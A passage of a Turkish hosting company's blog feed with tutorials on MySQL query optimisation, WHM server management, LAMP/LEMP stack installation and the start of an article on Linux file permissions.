<p><a rel="nofollow" href="https://www.cenuta.com/blog/lfi-rfi-sql-injection-gibi-zafiyetlere-karsi-sunucu-guvenligi/" data-wpel-link="exclude">LFI, RFI, SQL Injection Gibi Zafiyetlere Karşı Sunucu Güvenliği</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>MySQL Performans Optimizasyonu Nasıl Yapılır? Index Kullanımı ve Sorgu Hızlandırma Nasıl Yapılır?</title>
		<link>https://www.cenuta.com/blog/mysql-performans-optimizasyonu-nasil-yapilir-index-kullanimi-ve-sorgu-hizlandirma-nasil-yapilir/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Mon, 21 Apr 2025 05:11:28 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23190</guid>

					<description><![CDATA[<p>Veritabanı performansı, yüksek trafikli uygulamalarda sistemin sürekliliği ve verimliliği açısından<a href="https://www.cenuta.com/blog/mysql-performans-optimizasyonu-nasil-yapilir-index-kullanimi-ve-sorgu-hizlandirma-nasil-yapilir/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/mysql-performans-optimizasyonu-nasil-yapilir-index-kullanimi-ve-sorgu-hizlandirma-nasil-yapilir/" data-wpel-link="exclude">MySQL Performans Optimizasyonu Nasıl Yapılır? Index Kullanımı ve Sorgu Hızlandırma Nasıl Yapılır?</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Veritabanı performansı, yüksek trafikli uygulamalarda sistemin sürekliliği ve verimliliği açısından kritik öneme sahiptir. MySQL performans optimizasyonu, yalnızca donanım kaynaklarını verimli kullanmakla sınırlı değildir; aynı zamanda doğru sorgu yapıları, uygun indeksleme stratejileri ve optimizasyon tekniklerini de içerir.</p>



<p>Bu makalede MySQL veritabanlarında performansı artırmak için kullanılabilecek en etkili yöntemler detaylı biçimde ele alınacaktır. Özellikle <strong>index (indeks) kullanımı</strong>, <strong>yavaş sorguların tespiti</strong>, <strong>veritabanı yapılandırmaları</strong> ve <strong>optimize edilmiş SQL ifadeleri</strong> gibi konulara odaklanılacaktır.</p>



<h2 class="wp-block-heading">Index Kullanımı Nedir ve Neden Önemlidir?</h2>



<p>MySQL&#8217;de <strong>index</strong>, tablo üzerinde arama işlemlerini hızlandırmak için kullanılan veri yapılarıdır. Bir tabloya index eklendiğinde, MySQL belirli sütunlarda yapılan arama, sıralama ve birleştirme işlemlerini çok daha hızlı bir şekilde gerçekleştirir.</p>



<h3 class="wp-block-heading">Temel Index Türleri</h3>



<ul class="wp-block-list">
<li><strong>PRIMARY KEY</strong>: Her tabloda yalnızca bir adet olabilir. Benzersiz ve boş olmayan değerleri temsil eder.</li>



<li><strong>UNIQUE INDEX</strong>: Tekrarlayan değerleri engeller, her değerin benzersiz olmasını sağlar.</li>



<li><strong>FULLTEXT INDEX</strong>: Metin arama işlemleri için kullanılır.</li>



<li><strong>COMPOSITE INDEX</strong>: Birden fazla sütunu kapsayan index yapısıdır.</li>
</ul>



<h3 class="wp-block-heading">Index Kullanımında Dikkat Edilmesi Gerekenler</h3>



<ul class="wp-block-list">
<li>Gereksiz index’ler, yazma (INSERT, UPDATE, DELETE) işlemlerinde performans kaybına yol açar.</li>



<li>Her sütun için index oluşturmak yerine, sık kullanılan sorgulara göre stratejik index’ler belirlenmelidir.</li>



<li><code>EXPLAIN</code> komutu kullanılarak hangi sorguların index kullandığı analiz edilmelidir.</li>
</ul>



<h2 class="wp-block-heading">EXPLAIN ile Sorgu Analizi Nasıl Yapılır?</h2>



<p>MySQL&#8217;de bir sorgunun nasıl yürütüldüğünü analiz etmek için <code>EXPLAIN</code> komutu kullanılır. Bu komut, sorgunun hangi tabloları taradığını, hangi index&#8217;leri kullandığını ve sıralama işlemleri yapıp yapmadığını gösterir.</p>



<pre class="wp-block-code"><code>EXPLAIN SELECT * FROM kullanicilar WHERE email = 'ornek@mail.com';
</code></pre>



<p>Bu analizle:</p>



<ul class="wp-block-list">
<li><code>type</code> sütunundan erişim tipi (örneğin <code>ALL</code>, <code>index</code>, <code>range</code>) görülebilir.</li>



<li><code>key</code> sütunu, kullanılan index&#8217;i gösterir.</li>



<li><code>rows</code> sütunu, sorgunun kaç satırı tarayacağını belirtir.</li>
</ul>



<p><code>type = ALL</code> değeri, tablo taraması yapıldığını gösterir ve performans açısından kaçınılmalıdır.</p>



<h2 class="wp-block-heading">SQL Sorgularını Hızlandırma Teknikleri</h2>



<h3 class="wp-block-heading">1. Gereksiz Sütunlardan Kaçının</h3>



<p>Tüm sütunları çağıran <code>SELECT *</code> yerine sadece gerekli sütunlar belirtilmelidir.</p>



<pre class="wp-block-code"><code>SELECT ad, soyad FROM kullanicilar WHERE durum = 'aktif';
</code></pre>



<h3 class="wp-block-heading">2. WHERE Şartlarını Doğru Kullanın</h3>



<p>Sorgularda WHERE şartları, filtreleme yaparak sorgunun tarayacağı satır sayısını azaltır. Sık kullanılan filtre sütunlarına index eklenmesi önerilir.</p>



<h3 class="wp-block-heading">3. JOIN Kullanımında Dikkatli Olun</h3>



<p>JOIN işlemleri özellikle büyük tablolar üzerinde çalışırken performans sorunlarına neden olabilir.</p>



<ul class="wp-block-list">
<li>Join yapılacak sütunların her iki tabloda da index’li olması önemlidir.</li>



<li><code>LEFT JOIN</code> yerine mümkünse <code>INNER JOIN</code> tercih edilmelidir.</li>
</ul>



<h3 class="wp-block-heading">4. LIMIT ve OFFSET Kullanımına Dikkat</h3>



<p>Büyük veri kümesinde <code>LIMIT 100000 OFFSET 0</code> gibi sorgular veritabanını zorlayabilir. Bunun yerine &#8220;id ile sayfalama&#8221; gibi alternatifler tercih edilebilir.</p>



<pre class="wp-block-code"><code>SELECT * FROM kayitlar WHERE id &gt; 100000 LIMIT 100;
</code></pre>



<h3 class="wp-block-heading">5. Alt Sorgular Yerine JOIN Kullanımı</h3>



<p>Alt sorgular (subqueries) yerine JOIN ifadeleri daha performanslı çalışabilir.</p>



<pre class="wp-block-code"><code>-- Yavaş Sorgu
SELECT * FROM urunler WHERE kategori_id IN (SELECT id FROM kategoriler WHERE aktif = 1);

-- Daha Hızlı Sorgu
SELECT u.* FROM urunler u JOIN kategoriler k ON u.kategori_id = k.id WHERE k.aktif = 1;
</code></pre>



<h2 class="wp-block-heading">MySQL Yapılandırması ile Performans Artırma</h2>



<p>Veritabanı ayarlarının optimize edilmesi performansa doğrudan katkı sağlar. Aşağıda bazı önemli yapılandırmalar yer almaktadır.</p>



<h3 class="wp-block-heading">1. query_cache_size</h3>



<p>Query cache özelliği aktifse, tekrar eden sorgular bellekte saklanarak daha hızlı yanıt verilir. Ancak modern MySQL sürümlerinde bu özellik kaldırılmıştır veya devre dışıdır. MariaDB gibi sistemlerde hâlen kullanılabilir.</p>



<h3 class="wp-block-heading">2. innodb_buffer_pool_size</h3>



<p>InnoDB motoru kullanan sistemlerde bu parametre, veritabanı tablolarının bellekte tutulmasını sağlar. Genellikle fiziksel belleğin %60-70’i kadar ayarlanır.</p>



<h3 class="wp-block-heading">3. tmp_table_size ve max_heap_table_size</h3>



<p>Geçici tablolar bellekte tutuluyorsa daha hızlı işlem yapılır. Bu parametrelerin artırılması, karmaşık sorgularda performansı iyileştirir.</p>



<h2 class="wp-block-heading">Yavaş Sorgu Logları ile Performans Takibi</h2>



<p>MySQL’in yavaş sorgu günlüğü özelliği sayesinde, belirli sürenin üzerinde çalışan SQL ifadeleri kaydedilir. Bu kayıtlar analiz edilerek darboğaz yaratan sorgular tespit edilebilir.</p>



<p><strong>Aktif Etmek İçin:</strong></p>



<pre class="wp-block-code"><code>&#091;mysqld]
slow_query_log = 1
slow_query_log_file = /var/log/mysql-slow.log
long_query_time = 2
</code></pre>



<p>Bu yapılandırma ile 2 saniyeden uzun süren tüm sorgular log dosyasına kaydedilecektir.</p>



<h2 class="wp-block-heading">Veritabanı Normalizasyonu ve Performansa Etkisi</h2>



<p>Normalizasyon, veri tekrarını önlerken veri bütünlüğünü sağlar. Ancak aşırı normalizasyon, fazla sayıda JOIN işlemine neden olarak performansı olumsuz etkileyebilir. Kritik uygulamalarda performans ve veri bütünlüğü dengesi kurulmalı, gerekirse denormalizasyon tercih edilmelidir.</p>



<h2 class="wp-block-heading">Sonuç</h2>



<p>MySQL performans optimizasyonu, sadece donanım değil; sorgu yazımı, indeksleme, yapılandırma ve izleme gibi birçok katmanda uygulanması gereken bir süreçtir. Özellikle <strong>doğru index kullanımı</strong>, <strong>EXPLAIN ile analiz</strong>, <strong>yavaş sorguların tespiti</strong> ve <strong>sunucu yapılandırmalarının optimize edilmesi</strong> gibi adımlar performans üzerinde doğrudan etkili olur.</p>



<p>Yüksek performanslı bir veritabanı yapısı kurmak ve sürdürülebilir hale getirmek için periyodik analizler yapılmalı, sorgular düzenli olarak gözden geçirilmelidir.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/mysql-performans-optimizasyonu-nasil-yapilir-index-kullanimi-ve-sorgu-hizlandirma-nasil-yapilir/" data-wpel-link="exclude">MySQL Performans Optimizasyonu Nasıl Yapılır? Index Kullanımı ve Sorgu Hızlandırma Nasıl Yapılır?</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>WHM Nedir ve Nasıl Kullanılır? WHM ile Sunucu Yönetimi Rehberi</title>
		<link>https://www.cenuta.com/blog/whm-nedir-ve-nasil-kullanilir-whm-ile-sunucu-yonetimi-rehberi/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Thu, 03 Apr 2025 05:33:46 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23083</guid>

					<description><![CDATA[<p>Web hosting yönetimi, sunucu sahipleri ve hosting sağlayıcıları için kritik<a href="https://www.cenuta.com/blog/whm-nedir-ve-nasil-kullanilir-whm-ile-sunucu-yonetimi-rehberi/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/whm-nedir-ve-nasil-kullanilir-whm-ile-sunucu-yonetimi-rehberi/" data-wpel-link="exclude">WHM Nedir ve Nasıl Kullanılır? WHM ile Sunucu Yönetimi Rehberi</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Web hosting yönetimi, sunucu sahipleri ve hosting sağlayıcıları için kritik bir konudur. Web Host Manager (WHM), cPanel tabanlı sunucuların yönetimini kolaylaştıran güçlü bir araçtır. Bu makalede, WHM&#8217;nin ne olduğu, nasıl kullanıldığı ve sunucu yönetimi için sağladığı avantajlar detaylı bir şekilde ele alınacaktır.</p>



<h2 class="wp-block-heading">WHM Nedir?</h2>



<p>WHM (Web Host Manager), cPanel tarafından geliştirilen bir yönetim panelidir ve genellikle sunucu sahipleri ve bayi (reseller) hosting kullanıcıları tarafından kullanılır. WHM, birden fazla cPanel hesabını yönetme, sunucu yapılandırmalarını düzenleme ve kaynak tahsis etme gibi işlemleri yapabilmeyi sağlar.</p>



<h3 class="wp-block-heading">WHM&#8217;nin Temel Özellikleri</h3>



<ul class="wp-block-list">
<li><strong>cPanel Hesap Yönetimi:</strong> Yeni cPanel hesapları oluşturma, düzenleme ve silme</li>



<li><strong>Kaynak Tahsisi:</strong> CPU, RAM, bant genişliği ve depolama gibi kaynakları belirleme</li>



<li><strong>Güvenlik Yönetimi:</strong> Güvenlik duvarı kuralları belirleme ve erişim yetkilendirme</li>



<li><strong>Yedekleme Yönetimi:</strong> Sunucu yedeklemelerini planlama ve yönetme</li>



<li><strong>DNS ve E-posta Yönetimi:</strong> Alan adı yapılandırmaları ve e-posta sunucusu yönetimi</li>



<li><strong>SSL Sertifikaları:</strong> SSL kurulumu ve yönetimi</li>
</ul>



<h2 class="wp-block-heading">WHM Nasıl Kullanılır?</h2>



<p>WHM paneline erişmek ve yönetmek için aşağıdaki adımları takip edebilirsiniz.</p>



<h3 class="wp-block-heading">1. WHM&#8217;ye Giriş Yapma</h3>



<p>WHM&#8217;ye erişmek için aşağıdaki adımları izleyin:</p>



<ul class="wp-block-list">
<li>Tarayıcınızın adres çubuğuna <strong><a href="https://sunucu-ip-adresi:2087" data-wpel-link="external" target="_self" rel="nofollow external noopener noreferrer">https://sunucu-ip-adresi:2087</a></strong> yazın.</li>



<li>Kullanıcı adı ve şifrenizi girerek oturum açın.</li>



<li>Başarılı giriş sonrası, WHM ana paneline yönlendirilirsiniz.</li>
</ul>



<h3 class="wp-block-heading">2. Yeni cPanel Hesabı Oluşturma</h3>



<p>Yeni bir cPanel hesabı oluşturmak için:</p>



<ul class="wp-block-list">
<li><strong>WHM Ana Sayfası &gt; Account Functions &gt; Create a New Account</strong> seçeneğine gidin.</li>



<li>Alan adı, kullanıcı adı, şifre ve kaynak limitlerini belirleyin.</li>



<li><strong>Create</strong> butonuna basarak hesabı oluşturun.</li>
</ul>



<h3 class="wp-block-heading">3. Sunucu Kaynak Yönetimi</h3>



<p>WHM ile sunucunuzdaki kaynakları yönetebilirsiniz:</p>



<ul class="wp-block-list">
<li><strong>Service Manager</strong> üzerinden çalışan servisleri kontrol edebilirsiniz.</li>



<li><strong>Process Manager</strong> ile sistem kaynaklarını takip edebilir ve gerekirse aşırı yük oluşturan işlemleri sonlandırabilirsiniz.</li>



<li><strong>Tweak Settings</strong> bölümünden sunucu yapılandırmalarını düzenleyebilirsiniz.</li>
</ul>



<h3 class="wp-block-heading">4. Yedekleme ve Geri Yükleme</h3>



<p>WHM, otomatik yedekleme planlamanıza olanak tanır:</p>



<ul class="wp-block-list">
<li><strong>WHM &gt; Backup &gt; Backup Configuration</strong> bölümüne gidin.</li>



<li>Yedekleme sıklığını ve saklanma süresini belirleyin.</li>



<li>Gerekli yedekleme seçeneklerini işaretleyerek <strong>Save Configuration</strong> butonuna basın.</li>
</ul>



<h3 class="wp-block-heading">5. Güvenlik Önlemleri</h3>



<p>Sunucunuzun güvenliğini sağlamak için:</p>



<ul class="wp-block-list">
<li><strong>CSF (ConfigServer Security &amp; Firewall)</strong> eklentisini kullanarak güvenlik duvarı kurallarını yönetin.</li>



<li><strong>ModSecurity</strong> etkinleştirerek web uygulamalarınızı saldırılara karşı koruyun.</li>



<li><strong>Two-Factor Authentication (2FA)</strong> ile WHM girişlerini daha güvenli hale getirin.</li>
</ul>



<h3 class="wp-block-heading">6. DNS ve Alan Adı Yönetimi</h3>



<p>WHM üzerinden DNS kayıtlarını yapılandırabilirsiniz:</p>



<ul class="wp-block-list">
<li><strong>WHM &gt; Edit DNS Zone</strong> sekmesine girin.</li>



<li>Alan adınızı seçerek gerekli A, MX, CNAME ve TXT kayıtlarını düzenleyin.</li>
</ul>



<h3 class="wp-block-heading">7. SSL Sertifikası Kurulumu</h3>



<p>SSL sertifikası yüklemek için:</p>



<ul class="wp-block-list">
<li><strong>WHM &gt; SSL/TLS &gt; Install an SSL Certificate on a Domain</strong> bölümüne girin.</li>



<li>Alan adını seçin ve SSL sertifika bilgilerini girin.</li>



<li><strong>Install</strong> butonuna basarak kurulumu tamamlayın.</li>
</ul>



<h2 class="wp-block-heading">WHM Kullanmanın Avantajları</h2>



<ul class="wp-block-list">
<li><strong>Kolay Yönetim:</strong> Kullanıcı dostu arayüzü ile sunucu yönetimini basitleştirir.</li>



<li><strong>Özelleştirme:</strong> Sunucu ayarlarını ihtiyaca göre özelleştirme imkanı sunar.</li>



<li><strong>Güvenlik:</strong> Gelişmiş güvenlik ayarları ile sunucunuzu koruma altına alır.</li>



<li><strong>Otomatik Yedekleme:</strong> Veri kaybını önlemek için düzenli yedekleme yapma olanağı sunar.</li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>WHM, web hosting yönetimi konusunda en güçlü araçlardan biridir ve hem bayi hosting kullanıcıları hem de sunucu yöneticileri için kapsamlı bir çözüm sunar. Bu rehberde, WHM’nin temel özellikleri, kullanımı ve sunucu yönetimi için sağladığı avantajlar ele alınmıştır. Sunucunuzu daha verimli yönetmek için WHM’yi doğru şekilde kullanmanız büyük önem taşımaktadır.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/whm-nedir-ve-nasil-kullanilir-whm-ile-sunucu-yonetimi-rehberi/" data-wpel-link="exclude">WHM Nedir ve Nasıl Kullanılır? WHM ile Sunucu Yönetimi Rehberi</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>LAMP ve LEMP Stack Nedir? Linux Web Sunucusu Kurulumu ve Karşılaştırması</title>
		<link>https://www.cenuta.com/blog/lamp-ve-lemp-stack-nedir-linux-web-sunucusu-kurulumu-ve-karsilastirmasi/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Sat, 15 Mar 2025 05:24:35 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=22956</guid>

					<description><![CDATA[<p>Web sunucuları, modern internetin temel taşlarından biridir ve çeşitli yazılım<a href="https://www.cenuta.com/blog/lamp-ve-lemp-stack-nedir-linux-web-sunucusu-kurulumu-ve-karsilastirmasi/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/lamp-ve-lemp-stack-nedir-linux-web-sunucusu-kurulumu-ve-karsilastirmasi/" data-wpel-link="exclude">LAMP ve LEMP Stack Nedir? Linux Web Sunucusu Kurulumu ve Karşılaştırması</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Web sunucuları, modern internetin temel taşlarından biridir ve çeşitli yazılım bileşenlerinden oluşan &#8220;stack&#8221; yapıları ile çalışırlar. LAMP ve LEMP, Linux tabanlı en popüler web sunucu stack&#8217;lerinden ikisidir. Bu teknolojiler, web uygulamalarını barındırmak ve yönetmek için gerekli olan bileşenleri bir araya getirir.</p>



<p>Bu makalede LAMP ve LEMP stack&#8217;lerinin ne olduğu, nasıl çalıştıkları, kurulum adımları ve aralarındaki temel farklar ele alınacaktır.</p>



<h3 class="wp-block-heading">LAMP ve LEMP Stack Nedir</h3>



<p>LAMP ve LEMP stack, Linux işletim sistemi üzerinde çalışan açık kaynaklı web sunucu ortamlarını ifade eder.</p>



<ul class="wp-block-list">
<li><strong>LAMP (Linux, Apache, MySQL, PHP)</strong>
<ul class="wp-block-list">
<li><strong>Linux</strong>: İşletim sistemi olarak kullanılır.</li>



<li><strong>Apache</strong>: Web sunucusu görevi görür.</li>



<li><strong>MySQL</strong>: Veritabanı yönetim sistemidir.</li>



<li><strong>PHP</strong>: Sunucu tarafında çalışan programlama dilidir.</li>
</ul>
</li>



<li><strong>LEMP (Linux, Nginx, MySQL/MariaDB, PHP/Python/Perl)</strong>
<ul class="wp-block-list">
<li><strong>Linux</strong>: İşletim sistemidir.</li>



<li><strong>Nginx</strong>: Web sunucusudur. Apache’ye göre daha yüksek performans sunar.</li>



<li><strong>MySQL veya MariaDB</strong>: Veritabanı yönetim sistemi olarak kullanılır.</li>



<li><strong>PHP, Python veya Perl</strong>: Sunucu tarafında çalışan programlama dilleri kullanılabilir.</li>
</ul>
</li>
</ul>



<p>Her iki yapı da benzer bileşenlere sahiptir, ancak en büyük fark web sunucusu bileşenidir. LAMP, Apache’yi kullanırken, LEMP Nginx’i kullanır.</p>



<h3 class="wp-block-heading">LAMP Stack Kurulumu</h3>



<p>LAMP kurulumu, Linux terminalinde aşağıdaki adımlar izlenerek gerçekleştirilir.</p>



<h4 class="wp-block-heading">1. Apache Web Sunucusunu Kurma</h4>



<p>Ubuntu veya Debian tabanlı bir sistemde Apache’yi yüklemek için:</p>



<pre class="wp-block-code"><code>sudo apt update
sudo apt install apache2 -y
</code></pre>



<p>Kurulum tamamlandıktan sonra Apache’yi başlatın ve sistem başlangıcına ekleyin:</p>



<pre class="wp-block-code"><code>sudo systemctl start apache2
sudo systemctl enable apache2
</code></pre>



<p>Tarayıcıda <code>http://sunucu-ip-adresi</code> adresini ziyaret ederek Apache’nin çalıştığını doğrulayabilirsiniz.</p>



<h4 class="wp-block-heading">2. MySQL Veritabanını Kurma</h4>



<pre class="wp-block-code"><code>sudo apt install mysql-server -y
</code></pre>



<p>MySQL güvenlik yapılandırmasını başlatın:</p>



<pre class="wp-block-code"><code>sudo mysql_secure_installation
</code></pre>



<p>Burada root şifresi belirleyebilir ve gereksiz varsayılan hesapları kaldırabilirsiniz.</p>



<h4 class="wp-block-heading">3. PHP Kurulumu</h4>



<p>Apache ile PHP’yi çalıştırmak için:</p>



<pre class="wp-block-code"><code>sudo apt install php libapache2-mod-php php-mysql -y
</code></pre>



<p>PHP sürümünü kontrol etmek için:</p>



<pre class="wp-block-code"><code>php -v
</code></pre>



<p>Sunucunun PHP dosyalarını işleyip işlemediğini görmek için <code>/var/www/html/</code> dizinine <code>info.php</code> adında bir dosya oluşturun ve içine şu satırları ekleyin:</p>



<pre class="wp-block-code"><code>&lt;?php
phpinfo();
?&gt;
</code></pre>



<p>Tarayıcıda <code>http://sunucu-ip-adresi/info.php</code> adresini ziyaret ederek PHP’nin çalıştığını doğrulayabilirsiniz.</p>



<h3 class="wp-block-heading">LEMP Stack Kurulumu</h3>



<p>LEMP kurulumu, LAMP’e benzer ancak Apache yerine Nginx kullanılır.</p>



<h4 class="wp-block-heading">1. Nginx Web Sunucusunu Kurma</h4>



<pre class="wp-block-code"><code>sudo apt update
sudo apt install nginx -y
</code></pre>



<p>Nginx’i başlatın ve sistem başlangıcına ekleyin:</p>



<pre class="wp-block-code"><code>sudo systemctl start nginx
sudo systemctl enable nginx
</code></pre>



<p>Tarayıcıda <code>http://sunucu-ip-adresi</code> adresine giderek Nginx’in çalıştığını doğrulayabilirsiniz.</p>



<h4 class="wp-block-heading">2. MySQL veya MariaDB Kurulumu</h4>



<pre class="wp-block-code"><code>sudo apt install mysql-server -y
</code></pre>



<p>MariaDB kullanmak isterseniz:</p>



<pre class="wp-block-code"><code>sudo apt install mariadb-server -y
</code></pre>



<p>Güvenlik yapılandırmasını başlatın:</p>



<pre class="wp-block-code"><code>sudo mysql_secure_installation
</code></pre>



<p>Veritabanı bağlantısını test etmek için MySQL’e giriş yapın:</p>



<pre class="wp-block-code"><code>sudo mysql -u root -p
</code></pre>



<h4 class="wp-block-heading">3. PHP-FPM Kurulumu</h4>



<p>Nginx, PHP-FPM (FastCGI Process Manager) kullanır:</p>



<pre class="wp-block-code"><code>sudo apt install php-fpm php-mysql -y
</code></pre>



<p>Nginx&#8217;in PHP-FPM ile çalışabilmesi için <code>/etc/nginx/sites-available/default</code> dosyasını düzenleyerek PHP-FPM desteğini etkinleştirin.</p>



<h3 class="wp-block-heading">LAMP ve LEMP Karşılaştırması</h3>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>Özellik</th><th>LAMP (Apache)</th><th>LEMP (Nginx)</th></tr></thead><tbody><tr><td>Web Sunucusu</td><td>Apache</td><td>Nginx</td></tr><tr><td>Performans</td><td>Dinamik içerik için iyidir</td><td>Statik içerik için daha hızlıdır</td></tr><tr><td>Trafik Yönetimi</td><td>Yoğun trafikte daha fazla kaynak tüketir</td><td>Daha az kaynak kullanır</td></tr><tr><td>Yapılandırma</td><td>.htaccess desteği sunar</td><td>.htaccess kullanmaz, doğrudan yapılandırma dosyalarını kullanır</td></tr><tr><td>Veritabanı</td><td>MySQL/MariaDB</td><td>MySQL/MariaDB</td></tr><tr><td>Programlama Dili</td><td>PHP, Perl, Python</td><td>PHP, Perl, Python</td></tr></tbody></table></figure>



<h3 class="wp-block-heading">Hangi Stack Kullanılmalı</h3>



<ul class="wp-block-list">
<li><strong>LAMP</strong>, küçük ve orta ölçekli web projeleri için uygundur. Apache’nin esnekliği ve geniş modül desteği nedeniyle birçok uygulama için tercih edilir.</li>



<li><strong>LEMP</strong>, yüksek trafikli web siteleri, CDN hizmetleri ve ters proxy (reverse proxy) gerektiren projelerde daha iyi performans sunar.</li>
</ul>



<p>Eğer bir WordPress veya Joomla gibi CMS kullanıyorsanız LAMP yeterli olabilir. Ancak yoğun trafik alan bir web sitesi veya API sunucusu çalıştırıyorsanız LEMP daha iyi bir seçim olacaktır.</p>



<h3 class="wp-block-heading">Sonuç</h3>



<p>LAMP ve LEMP, Linux üzerinde web sunucusu çalıştırmak için en yaygın kullanılan çözümlerden ikisidir. LAMP, geleneksel ve esnek bir yapı sunarken, LEMP daha hafif ve hızlı bir alternatif olarak öne çıkar. İhtiyacınıza bağlı olarak uygun stack’i seçerek verimli bir web sunucu ortamı oluşturabilirsiniz.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/lamp-ve-lemp-stack-nedir-linux-web-sunucusu-kurulumu-ve-karsilastirmasi/" data-wpel-link="exclude">LAMP ve LEMP Stack Nedir? Linux Web Sunucusu Kurulumu ve Karşılaştırması</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Linux Permission (İzin) Sistemi Nedir? chmod ve chown Komutları ile Yetkilendirme</title>
		<link>https://www.cenuta.com/blog/linux-permission-izin-sistemi-nedir-chmod-ve-chown-komutlari-ile-yetkilendirme/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Fri, 14 Mar 2025 04:33:11 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=22945</guid>

					<description><![CDATA[<p>Linux, çok kullanıcılı ve çok görevli bir işletim sistemi olduğu<a href="https://www.cenuta.com/blog/linux-permission-izin-sistemi-nedir-chmod-ve-chown-komutlari-ile-yetkilendirme/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/linux-permission-izin-sistemi-nedir-chmod-ve-chown-komutlari-ile-yetkilendirme/" data-wpel-link="exclude">Linux Permission (İzin) Sistemi Nedir? chmod ve chown Komutları ile Yetkilendirme</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Linux, çok kullanıcılı ve çok görevli bir işletim sistemi olduğu için güvenlik büyük önem taşır. Dosya ve dizin erişim izinleri, sistemin güvenliğini sağlamak için belirli kullanıcı ve grupların dosyalara nasıl erişebileceğini ve hangi işlemleri gerçekleştirebileceğini belirler. Linux’ta <strong>chmod</strong> ve <strong>chown</strong> gibi komutlar, dosya ve dizin yetkilendirmesi yapmak için kullanılır.</p>



<p>Bu makalede, Linux’ta izin sisteminin nasıl çalıştığını, chmod ve chown komutlarının nasıl kullanıldığını ve sistem güvenliği açısından neden önemli olduğunu detaylı bir şekilde ele alacağız.</p>



<h3 class="wp-block-heading">Linux Permission (İzin) Sistemi Nedir?</h3>



<p>Linux’ta her dosya ve dizin, belirli bir sahiplik ve izin sistemine sahiptir. Bu sistem, <strong>kullanıcılar (users), gruplar (groups) ve diğerleri (others)</strong> olmak üzere üç ana kategoriye ayrılır.</p>



<h4 class="wp-block-heading">1. Kullanıcı Kategorileri</h4>



<ul class="wp-block-list">
<li><strong>Owner (Sahip)</strong>: Dosyayı veya dizini oluşturan kullanıcıdır. Sahip, bu dosya üzerinde geniş yetkilere sahiptir.</li>



<li><strong>Group (Grup)</strong>: Sahibin dahil olduğu kullanıcı grubudur. Grup üyeleri, sahip kadar olmasa da belirli yetkilere sahip olabilir.</li>



<li><strong>Others (Diğerleri)</strong>: Sahip ve gruba ait olmayan tüm diğer kullanıcılardır.</li>
</ul>



<h4 class="wp-block-heading">2. İzin Türleri</h4>



<p>Linux’ta her dosya ve dizin için üç temel izin türü bulunur:</p>



<ul class="wp-block-list">
<li><strong>r (read &#8211; okuma)</strong>: Dosyanın içeriğini okuma yetkisi</li>



<li><strong>w (write &#8211; yazma)</strong>: Dosyanın içeriğini değiştirme veya dizine yeni dosya ekleme yetkisi</li>



<li><strong>x (execute &#8211; çalıştırma)</strong>: Dosyanın çalıştırılabilir bir program olup olmadığına karar veren izin</li>
</ul>



<p>Bir dosyanın izinleri, <strong>ls -l</strong> komutu ile görüntülenebilir:</p>



<pre class="wp-block-code"><code>ls -l dosya.txt
</code></pre>



<p>Örnek çıktı:</p>



<pre class="wp-block-code"><code>-rw-r--r--  1 kullanici grup  1234 Mar 14 12:00 dosya.txt
</code></pre>



<p>Bu çıktıda,</p>



<ul class="wp-block-list">
<li><code>rw-</code> sahibin (owner) okuma ve yazma iznine sahip olduğunu,</li>



<li><code>r--</code> grubun yalnızca okuma iznine sahip olduğunu,</li>



<li><code>r--</code> diğer kullanıcıların da yalnızca okuma iznine sahip olduğunu gösterir.</li>
</ul>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<h3 class="wp-block-heading">chmod Komutu ile İzin Değiştirme</h3>



